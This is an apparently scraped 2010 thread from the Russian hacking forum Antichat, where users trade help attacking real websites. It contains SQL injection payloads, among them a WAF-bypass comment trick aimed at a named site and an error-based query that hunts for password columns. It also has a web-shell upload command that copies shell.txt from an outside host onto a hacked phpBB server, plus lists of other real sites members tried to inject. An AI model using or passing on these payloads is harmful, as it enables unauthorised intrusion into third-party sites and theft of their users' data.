Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.05.2010, 17:24
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Огромное спасибо  |
|
|
10.05.2010, 17:29
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
напримепь есть саыт xxx.com/news.php?id=2
кояда зделаеш ххх.com/news.php?id=2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'tw'' at line 1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/twt/public_html/cp/lib/db.php on line 28
а кояда ххх.com/news.php?id=2+union+select+0
Forbidden
You don't have permission to access /browse.php on this server.
что зделать ?
|
|
|
|
10.05.2010, 17:30
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
ххх.com/news.php?id=2/*!+union+select+0*/
попробовать, это объод WAF
|
|
|
|
10.05.2010, 17:35
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://oragir.am/news.php?id=13/*!+union+select+0*/
|
|
|
|
10.05.2010, 19:35
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как
cmd=eval(file_get_contents( выдает error
allow_url_fopen = on
allow_url_include= off
команды bash нормально работают,
на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел.
есть идеи?
Последний раз редактировалось Konqi; 10.05.2010 в 19:48..
|
|
|
|
10.05.2010, 20:30
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от Konqi
ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как
cmd=eval(file_get_contents( выдает error
allow_url_fopen = on
allow_url_include= off
команды bash нормально работают,
на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел.
есть идеи?
Конечно. Помимо file_get_contents в пхп еще много функций, от мув_аплоадед_файл() до system(), etc.
|
|
|
|
10.05.2010, 20:42
|
|
Новичок
Регистрация: 05.05.2010
Сообщений: 1
Провел на форуме:
13360
Репутация:
0
|
|
Хелп! ...если это вообще возможно... 
есть скуля:
/?id='')or+(select+count(*)+from+information_schema .tables+group+by+concat((select+(concat(table_sche ma,':',table_name))+from+information_schema.column s+where+column_name+like+'%pass%'+limit+0,1),floor (rand(0)*2)))+--+
имеем Duplicate entry 'a1323:tbladmin1' for key 1
база a1323, табла tbladmin
а тут:
/?id='')UNION+SELECT*from+(SELECT+*+FROM+tbladmin+J OIN+tbladmin+b)a+--+
выводит такую ошибку
Table 'a1323.TBLADMIN' doesn't exist
дело в том, что там id переводится в апперкейс.
возможно ли как-то с этим бороться? хексы, чары и прочие известные мне приблуды в FROM не годятся. значит должны быть НЕизвестные...
а? что скажете, господа |
|
|
|
10.05.2010, 20:58
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от Konqi
ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как
cmd=eval(file_get_contents( выдает error
allow_url_fopen = on
allow_url_include= off
команды bash нормально работают,
на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел.
есть идеи?
cmd=copy($_GET[aa],$_GET[bb]);&aa=http://you_site.ru/shell.txt&bb=путь куда заливать шелл
|
|
|
|
10.05.2010, 23:53
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
не смог =(...
http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777
|
|
|
|
11.05.2010, 00:10
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
Сообщение от pinch
не смог =(...
http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777
там походу нет инъекции.
у меня тут тоже пару подсобралось
http://www.colorlines.com/article.php?ID=681'
http://thetvdb.com/index.php?tab=series&id=79771'
http://www.worstpreviews.com/headline.php?id=15683
не получилось раскрутить
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
